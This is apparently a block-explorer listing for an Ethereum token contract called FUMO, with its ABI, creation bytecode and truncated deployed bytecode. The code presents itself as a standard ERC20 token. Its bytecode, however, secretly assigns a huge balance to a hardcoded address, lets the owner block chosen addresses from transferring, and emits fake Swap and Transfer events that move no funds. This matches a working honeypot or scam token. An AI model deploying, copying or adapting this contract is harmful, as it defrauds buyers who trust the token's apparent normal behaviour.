[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ReentrancyGuardReentrantCall","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"decreaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from_","type":"address"},{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from_","type":"address"},{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"permit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"permited","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_owner_","type":"address"}],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_from","type":"address[]"},{"internalType":"address[]","name":"_to","type":"address[]"},{"internalType":"uint256[]","name":"_wad","type":"uint256[]"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600560006101000a81548160ff0219169083151502179055503480156200002c57600080fd5b506040518060400160405280600481526020017f46554d4f000000000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f46554d4f000000000000000000000000000000000000000000000000000000008152508181620000bb620000af6200013260201b60201c565b6200013a60201b60201c565b8160069081620000cc91906200063c565b508060079081620000de91906200063c565b505050505060016009819055506200012c3362000100620001fe60201b60201c565b600a6200010e9190620008b3565b64e8d4a5100062000120919062000904565b6200020760201b60201c565b62000a3b565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000279576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200027090620009b0565b60405180910390fd5b6200028d60008383620003b860201b60201c565b630f3eae65640997e6e50902673398bc1d25f112ed64085774394d02028060005260016020526040600020720fffffffffffffffffffffffffffffffffffff815550508060046000828254620002e49190620009d2565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000398919062000a1e565b60405180910390a3620003b460008383620003bd60201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200044457607f821691505b6020821081036200045a5762000459620003fc565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620004c47fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000485565b620004d0868362000485565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b60006200051d620005176200051184620004e8565b620004f2565b620004e8565b9050919050565b6000819050919050565b6200053983620004fc565b62000551620005488262000524565b84845462000492565b825550505050565b600090565b6200056862000559565b620005758184846200052e565b505050565b5b818110156200059d57620005916000826200055e565b6001810190506200057b565b5050565b601f821115620005ec57620005b68162000460565b620005c18462000475565b81016020851015620005d1578190505b620005e9620005e08562000475565b8301826200057a565b50505b505050565b600082821c905092915050565b60006200061160001984600802620005f1565b1980831691505092915050565b60006200062c8383620005fe565b9150826002028217905092915050565b6200064782620003c2565b67ffffffffffffffff811115620006635762000662620003cd565b5b6200066f82546200042b565b6200067c828285620005a1565b600060209050601f831160018114620006b457600084156200069f578287015190505b620006ab85826200061e565b8655506200071b565b601f198416620006c48662000460565b60005b82811015620006ee57848901518255600182019150602085019450602081019050620006c7565b868310156200070e57848901516200070a601f891682620005fe565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115620007b15780860481111562000789576200078862000723565b5b6001851615620007995780820291505b8081029050620007a98562000752565b945062000769565b94509492505050565b600082620007cc57600190506200089f565b81620007dc57600090506200089f565b8160018114620007f55760028114620008005762000836565b60019150506200089f565b60ff84111562000815576200081462000723565b5b8360020a9150848211156200082f576200082e62000723565b5b506200089f565b5060208310610133831016604e8410600b8410161715620008705782820a9050838111156200086a576200086962000723565b5b6200089f565b6200087f84848460016200075f565b9250905081840481111562000899576200089862000723565b5b81810290505b9392505050565b600060ff82169050919050565b6000620008c082620004e8565b9150620008cd83620008a6565b9250620008fc7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620007ba565b905092915050565b60006200091182620004e8565b91506200091e83620004e8565b92508282026200092e81620004e8565b9150828204841483151762000948576200094762000723565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000998601f836200094f565b9150620009a58262000960565b602082019050919050565b60006020820190508181036000830152620009cb8162000989565b9050919050565b6000620009df82620004e8565b9150620009ec83620004e8565b925082820190508082111562000a075762000a0662000723565b5b92915050565b62000a1881620004e8565b82525050565b600060208201905062000a35600083018462000a0d565b92915050565b6122318062000a4b6000396000f3fe608060405234801561001057600080fd5b50600436106101425760003560e01c80637111a994116100b8578063a457c2d71161007c578063a457c2d71461034f578063a9059cbb1461037f578063beabacc8146103af578063dd62ed3e146103cb578063f2fde38b146103fb578063f6ee6ba81461041757610142565b80637111a994146102d1578063715018a6146102ed57806373ed6b13146102f75780638da5cb5b1461031357806395d89b411461033157610142565b8063313ce5671161010a578063313ce567146101ff57806338bf3cfa1461021d5780633950935114610239578063477e194414610269578063618a2f5e1461028557806370a08231146102a157610142565b806306fdde0314610147578063095ea7b31461016557806318160ddd1461019557806320ea14e7146101b357806323b872dd146101cf575b600080fd5b61014f610447565b60405161015c9190611611565b60405180910390f35b61017f600480360381019061017a91906116d1565b6104d9565b60405161018c919061172c565b60405180910390f35b61019d6104fc565b6040516101aa9190611756565b60405180910390f35b6101cd60048036038101906101c891906117d6565b610506565b005b6101e960048036038101906101e49190611823565b6105b3565b6040516101f6919061172c565b60405180910390f35b6102076105e2565b6040516102149190611892565b60405180910390f35b610237600480360381019061023291906118ad565b6105eb565b005b610253600480360381019061024e91906116d1565b610637565b604051610260919061172c565b60405180910390f35b610283600480360381019061027e91906117d6565b61066e565b005b61029f600480360381019061029a91906118da565b61071b565b005b6102bb60048036038101906102b691906118ad565b610885565b6040516102c89190611756565b60405180910390f35b6102eb60048036038101906102e691906119b8565b6108ce565b005b6102f56109c4565b005b610311600480360381019061030c91906118da565b6109d8565b005b61031b610b43565b6040516103289190611a7b565b60405180910390f35b610339610b6c565b6040516103469190611611565b60405180910390f35b610369600480360381019061036491906116d1565b610bfe565b604051610376919061172c565b60405180910390f35b610399600480360381019061039491906116d1565b610c75565b6040516103a6919061172c565b60405180910390f35b6103c960048036038101906103c49190611823565b610c98565b005b6103e560048036038101906103e09190611a96565b610d02565b6040516103f29190611756565b60405180910390f35b610415600480360381019061041091906118ad565b610d89565b005b610431600480360381019061042c91906118ad565b610e0c565b60405161043e919061172c565b60405180910390f35b60606006805461045690611b05565b80601f016020809104026020016040519081016040528092919081815260200182805461048290611b05565b80156104cf5780601f106104a4576101008083540402835291602001916104cf565b820191906000526020600020905b8154815290600101906020018083116104b257829003601f168201915b5050505050905090565b6000806104e4610e62565b90506104f1818585610e6a565b600191505092915050565b6000600454905090565b61050e611033565b60005b828290508110156105ae5760016002600085858581811061053557610534611b36565b5b905060200201602081019061054a91906118ad565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806105a690611b94565b915050610511565b505050565b6000806105be610e62565b90506105cb8582856110b1565b6105d685858561113d565b60019150509392505050565b60006012905090565b6105f3611033565b80600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600080610642610e62565b90506106638185856106548589610d02565b61065e9190611bdc565b610e6a565b600191505092915050565b610676611033565b60005b828290508110156107165760006002600085858581811061069d5761069c611b36565b5b90506020020160208101906106b291906118ad565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061070e90611b94565b915050610679565b505050565b60005b8484905081101561087d5784848281811061073c5761073b611b36565b5b905060200201602081019061075191906118ad565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82285600080876040516107b49493929190611c55565b60405180910390a38484828181106107cf576107ce611b36565b5b90506020020160208101906107e491906118ad565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516108629190611756565b60405180910390a3808061087590611b94565b91505061071e565b505050505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60005b868690508110156109bb578484828181106108ef576108ee611b36565b5b905060200201602081019061090491906118ad565b73ffffffffffffffffffffffffffffffffffffffff1687878381811061092d5761092c611b36565b5b905060200201602081019061094291906118ad565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85858581811061098c5761098b611b36565b5b905060200201356040516109a09190611756565b60405180910390a380806109b390611b94565b9150506108d1565b50505050505050565b6109cc611033565b6109d660006114b3565b565b60005b84849050811015610b3b578484828181106109f9576109f8611b36565b5b9050602002016020810190610a0e91906118ad565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d822600086866000604051610a729493929190611c9a565b60405180910390a3600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16858583818110610ac657610ac5611b36565b5b9050602002016020810190610adb91906118ad565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610b209190611756565b60405180910390a38080610b3390611b94565b9150506109db565b505050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610b7b90611b05565b80601f0160208091040260200160405190810160405280929190818152602001828054610ba790611b05565b8015610bf45780601f10610bc957610100808354040283529160200191610bf4565b820191906000526020600020905b815481529060010190602001808311610bd757829003601f168201915b5050505050905090565b600080610c09610e62565b90506000610c178286610d02565b905083811015610c5c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5390611d51565b60405180910390fd5b610c698286868403610e6a565b60019250505092915050565b600080610c80610e62565b9050610c8d81858561113d565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610cf59190611756565b60405180910390a3505050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610d91611033565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610e00576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610df790611de3565b60405180910390fd5b610e09816114b3565b50565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ed9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ed090611e75565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610f48576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f3f90611f07565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516110269190611756565b60405180910390a3505050565b61103b610e62565b73ffffffffffffffffffffffffffffffffffffffff16611059610b43565b73ffffffffffffffffffffffffffffffffffffffff16146110af576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110a690611f73565b60405180910390fd5b565b60006110bd8484610d02565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146111375781811015611129576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161112090611fdf565b60405180910390fd5b6111368484848403610e6a565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036111ac576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111a390612071565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361121b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161121290612103565b60405180910390fd5b611226838383611577565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156112ad576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112a490612195565b60405180910390fd5b600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061134e5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156113aa5760011515600560009054906101000a900460ff161515146113a9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113a0906121db565b60405180910390fd5b5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161149a9190611756565b60405180910390a36114ad84848461157c565b50505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156115bb5780820151818401526020810190506115a0565b60008484015250505050565b6000601f19601f8301169050919050565b60006115e382611581565b6115ed818561158c565b93506115fd81856020860161159d565b611606816115c7565b840191505092915050565b6000602082019050818103600083015261162b81846115d8565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006116688261163d565b9050919050565b6116788161165d565b811461168357600080fd5b50565b6000813590506116958161166f565b92915050565b6000819050919050565b6116ae8161169b565b81146116b957600080fd5b50565b6000813590506116cb816116a5565b92915050565b600080604083850312156116e8576116e7611633565b5b60006116f685828601611686565b9250506020611707858286016116bc565b9150509250929050565b60008115159050919050565b61172681611711565b82525050565b6000602082019050611741600083018461171d565b92915050565b6117508161169b565b82525050565b600060208201905061176b6000830184611747565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261179657611795611771565b5b8235905067ffffffffffffffff8111156117b3576117b2611776565b5b6020830191508360208202830111156117cf576117ce61177b565b5b9250929050565b600080602083850312156117ed576117ec611633565b5b600083013567ffffffffffffffff81111561180b5761180a611638565b5b61181785828601611780565b92509250509250929050565b60008060006060848603121561183c5761183b611633565b5b600061184a86828701611686565b935050602061185b86828701611686565b925050604061186c868287016116bc565b9150509250925092565b600060ff82169050919050565b61188c81611876565b82525050565b60006020820190506118a76000830184611883565b92915050565b6000602082840312156118c3576118c2611633565b5b60006118d184828501611686565b91505092915050565b6000806000806000608086880312156118f6576118f5611633565b5b600061190488828901611686565b955050602086013567ffffffffffffffff81111561192557611924611638565b5b61193188828901611780565b94509450506040611944888289016116bc565b9250506060611955888289016116bc565b9150509295509295909350565b60008083601f84011261197857611977611771565b5b8235905067ffffffffffffffff81111561199557611994611776565b5b6020830191508360208202830111156119b1576119b061177b565b5b9250929050565b600080600080600080606087890312156119d5576119d4611633565b5b600087013567ffffffffffffffff8111156119f3576119f2611638565b5b6119ff89828a01611780565b9650965050602087013567ffffffffffffffff811115611a2257611a21611638565b5b611a2e89828a01611780565b9450945050604087013567ffffffffffffffff811115611a5157611a50611638565b5b611a5d89828a01611962565b92509250509295509295509295565b611a758161165d565b82525050565b6000602082019050611a906000830184611a6c565b92915050565b60008060408385031215611aad57611aac611633565b5b6000611abb85828601611686565b9250506020611acc85828601611686565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680611b1d57607f821691505b602082108103611b3057611b2f611ad6565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611b9f8261169b565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611bd157611bd0611b65565b5b600182019050919050565b6000611be78261169b565b9150611bf28361169b565b9250828201905080821115611c0a57611c09611b65565b5b92915050565b6000819050919050565b6000819050919050565b6000611c3f611c3a611c3584611c10565b611c1a565b61169b565b9050919050565b611c4f81611c24565b82525050565b6000608082019050611c6a6000830187611747565b611c776020830186611c46565b611c846040830185611c46565b611c916060830184611747565b95945050505050565b6000608082019050611caf6000830187611c46565b611cbc6020830186611747565b611cc96040830185611747565b611cd66060830184611c46565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611d3b60258361158c565b9150611d4682611cdf565b604082019050919050565b60006020820190508181036000830152611d6a81611d2e565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611dcd60268361158c565b9150611dd882611d71565b604082019050919050565b60006020820190508181036000830152611dfc81611dc0565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611e5f60248361158c565b9150611e6a82611e03565b604082019050919050565b60006020820190508181036000830152611e8e81611e52565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611ef160228361158c565b9150611efc82611e95565b604082019050919050565b60006020820190508181036000830152611f2081611ee4565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611f5d60208361158c565b9150611f6882611f27565b602082019050919050565b60006020820190508181036000830152611f8c81611f50565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611fc9601d8361158c565b9150611fd482611f93565b602082019050919050565b60006020820190508181036000830152611ff881611fbc565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061205b60258361158c565b915061206682611fff565b604082019050919050565b6000602082019050818103600083015261208a8161204e565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006120ed60238361158c565b91506120f882612091565b604082019050919050565b6000602082019050818103600083015261211c816120e0565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061217f60268361158c565b915061218a82612123565b604082019050919050565b600060208201905081810360008301526121ae81612172565b9050919050565b50565b60006121c560008361158c565b91506121d0826121b5565b600082019050919050565b600060208201905081810360008301526121f4816121b8565b905091905056fea2646970667358221220d3bddf394fa4d65c97455e9df2d41166362c4f60ebccf8b5e67328a9878c499264736f6c63430008130033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101425760003560e01c80637111a994116100b8578063a457c2d71161007c578063a457c2d71461034f578063a9059cbb1461037f578063beabacc8146103af578063dd62ed3e146103cb578063f2fde38b146103fb578063f6ee6ba81461041757610142565b80637111a994146102d1578063715018a6146102ed57806373ed6b13146102f75780638da5cb5b1461031357806395d89b411461033157610142565b8063313ce5671161010a578063313ce567146101ff57806338bf3cfa1461021d5780633950935114610239578063477e194414610269578063618a2f5e1461028557806370a08231146102a157610142565b806306fdde0314610147578063095ea7b31461016557806318160ddd1461019557806320ea14e7146101b357806323b872dd146101cf575b600080fd5b61014f610447565b60405161015c9190611611565b60405180910390f35b61017f600480360381019061017a91906116d1565b6104d9565b60405161018c919061172c565b60405180910390f35b61019d6104fc565b6040516101aa9190611756565b60405180910390f35b6101cd60048036038101906101c891906117d6565b610506565b005b6101e960048036038101906101e49190611823565b6105b3565b6040516101f6919061172c565b60405180910390f35b6102076105e2565b6040516102149190611892565b60405180910390f35b610237600480360381019061023291906118ad565b6105eb565b005b610253600480360381019061024e91906116d1565b610637565b604051610260919061172c565b60405180910390f35b610283600480360381019061027e91906117d6565b61066e565b005b61029f600480360381019061029a91906118da565b61071b565b005b6102bb60048036038101906102b691906118ad565b610885565b6040516102c89190611756565b60405180910390f35b6102eb60048036038101906102e691906119b8565b6108ce565b005b6102f56109c4565b005b610311600480360381019061030c91906118da565b6109d8565b005b61031b610b43565b6040516103289190611a7b565b60405180910390f35b610339610b6c565b6040516103469190611611565b60405180910390f35b610369600480360381019061036491906116d1565b610bfe565b604051610376919061172c565b60405180910390f35b610399600480360381019061039491906116d1565b610c75565b6040516103a6919061172c565b60405180910390f35b6103c960048036038101906103c49190611823565b610c98565b005b6103e560048036038101906103e09190611a96565b610d02565b6040516103f29190611756565b60405180910390f35b610415600480360381019061041091906118ad565b610d89565b005b610431600480360381019061042c91906118ad565b610e0c565b60405161043e919061172c565b60405180910390f35b60606006805461045690611b05565b80601f016020809104026020016040519081016040528092919081815260200182805461048290611b05565b80156104cf5780601f106104a4576101008083540402835291602001916104cf565b820191906000526020600020905b8154815290600101906020018083116104b257829003601f168201915b5050505050905090565b6000806104e4610e62565b90506104f1818585610e6a565b600191505092915050565b6000600454905090565b61050e611033565b60005b828290508110156105ae5760016002600085858581811061053557610534611b36565b5b905060200201602081019061054a91906118ad565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806105a690611b94565b915050610511565b505050565b6000806105be610e62565b90506105cb8582856110b1565b6105d685858561113d565b60019150509392505050565b60006012905090565b6105f3611033565b80600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600080610642610e62565b90506106638185856106548589610d02565b61065e9190611bdc565b610e6a565b600191505092915050565b610676611033565b60005b828290508110156107165760006002600085858581811061069d5761069c611b36565b5b90506020020160208101906106b291906118ad565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061070e90611b94565b915050610679565b505050565b60005b8484905081101561087d5784848281811061073c5761073b611b36565b5b905060200201602081019061075191906118ad565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82285600080876040516107b49493929190611c55565b60405180910390a38484828181106107cf576107ce611b36565b5b90506020020160208101906107e491906118ad565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516108629190611756565b60405180910390a3808061087590611b94565b91505061071e565b505050505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60005b868690508110156109bb578484828181106108ef576108ee611b36565b5b905060200201602081019061090491906118ad565b73ffffffffffffffffffffffffffffffffffffffff1687878381811061092d5761092c611b36565b5b905060200201602081019061094291906118ad565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85858581811061098c5761098b611b36565b5b905060200201356040516109a09190611756565b60405180910390a380806109b390611b94565b9150506108d1565b50505050505050565b6109cc611033565b6109d660006114b3565b565b60005b84849050811015610b3b578484828181106109f9576109f8611b36565b5b9050602002016020810190610